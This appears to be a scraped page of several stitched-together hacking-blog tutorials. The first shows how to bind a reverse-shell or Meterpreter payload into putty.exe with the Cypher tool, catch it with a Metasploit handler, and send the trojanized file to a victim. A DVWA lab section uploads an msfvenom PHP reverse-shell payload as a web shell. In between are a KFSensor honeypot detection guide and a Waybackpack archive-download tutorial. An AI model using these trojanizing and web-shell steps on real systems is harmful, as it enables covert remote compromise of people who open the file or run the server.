Hack Remote Windows 10 PC using Cypher (Adding Shellcode to PE files)

First clone cypher repository from github, to do so type:

git clone https://github.com/xan7r/cypher.git

Now choose an executable file and copy to cypher folder to bind the cypher with any .exe file

Here in my case I have copied putty.exe as a file to bind with cipher

Note: only executable file can be binded.

Now run the following command

python addShell.py -f ./putty.exe -H 192.168.0.105 -P 4444 -p 0

Specify payload.  Default shell_reverse_tcp.  Valid values are:

0 – windows/shell_reverse_tcp

1 – windows/meterpreter/reverse_http

2 – windows/meterpreter/reverse_http +PrependMigrate

3 – windows/meterpreter/reverse_https

4 – windows/meterpreter/reverse_https +PrependMigrate

Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed. Start metasploit using msfconsole

use exploit/multi/handler

set payload windows/shell_reverse_tcp

set lhost 192.168.0.105

set lport 4444

exploit

Now send the binded putty_evil .exe to the victim, as soon as he opens the file a shell session will open

Detect Vulnerability Scanner in Network using Kfsensor

In the previous article, we have seen that how KFSensorHoneypot IDS detects any unauthorized person by simulating vulnerable system services. Well, vulnerability to a hacker is like jewels. Every hacker or malicious person  fist face of hacking is Footprinting and second is scanning where they get to know whether a system is vulnerable for performing an attack or not. So in this article, we will detect an unauthorized person or a hacker and stop it.

Install and start KFSensorHoneypot IDS server to do this read my previous article

http://www.hackingarticles.in/detect-hacker-network-using-kfsensor-honeypot

Here my KFSensorHoneypot is ready.

Scanning phase tells us whether systems is vulnerable or not and sometimes even provide us exploit information which is available for that vulnerability. So every of the hacker performs this step before exploiting your system.

 So here I try to scan my system running KFSensor with Nessus vulnerability scanner from another computer.

As you can see Nessus started scanning my system and finding the vulnerability.

Here you can see that KFSensorHoneypot IDS alerted you that someone is trying to scan your system for vulnerability and some of the packets your system is receiving are malicious and recorded attackers IP address.

Now I’m trying to scan my system with GFI Languard also to see that KFSensorIDS detect or not.

GFI Languard started scanning.

Here KFSensorHoneypot IDS alerted that someone is sending packets to get vulnerability of the system. Here you can monitor attacks on every TCP and UDP ports. Even you can see ICMP or ping messages.

Here you can see that someone is trying attacking on Port and his IP address is 192.168.149.1

You can also view alerts by visitor’s means which IP address is trying to access on which ports.

KfsensorHoneypot IDS can also detect whether someone is using a Vulnerability scanner or not to perform an attack on your system. Now we know that particular IP address is sending to many packets which are not good. So to block that IP address we have to create a separate policy for that visitor.

To do that double-click on IP address you want to block accessing your system, a menu will appear

Now click on details.

Here click on Create Visitor Ruleto create a policy.

After that select port, you want to block for that IP address and select actions Close or Ignore all requests from that particular IP address.

Author: AkshayBhardwaj is a passionate Hacker, Information Security Researcher | Technical writer. You can follow him on LinkedIn and Facebook

Web Server Penetration Testing with DVWA and Metasploit (Beginner Guide)

Open your kali linux terminal and type

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.140 lport=4444 -f raw

It will generate a raw code of php file

Now copy the generated code in the text file and save it on your desktop with .php extension

Now open the DVWA Webapp in your server and login with following credentials:

Username – admin

Password – password

Now scroll to the File Upload section in left pane and upload the above created php file

When you will finish uploading your php file, it will show you the path

Now open your uploaded file in browser

Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set lhost 192.168.0.140

set lport 4444

exploit

Now you can access the victim’s server

Find Your Website History using Waybackpack

Waybackpack is a command-line tool that lets you download the entire Wayback Machine archive for a given URL

Open your Kali Linux terminal and go to desktop and type the following command

git clone https://github.com/jsvine/waybackpack.git

Now go the waybackpack folder and type the following command

pip install waybackpack

Now run the following command to view any website for the particular year and save the result in .html format in the desired folder.

In example below I’m using hackingarticles.in for the year 2010 and saving the result in /Downloads/hacking-wayback

Now you will see the saved file in the desired folder.

See the result below

Related Posts Plugin for WordPress, Blogger...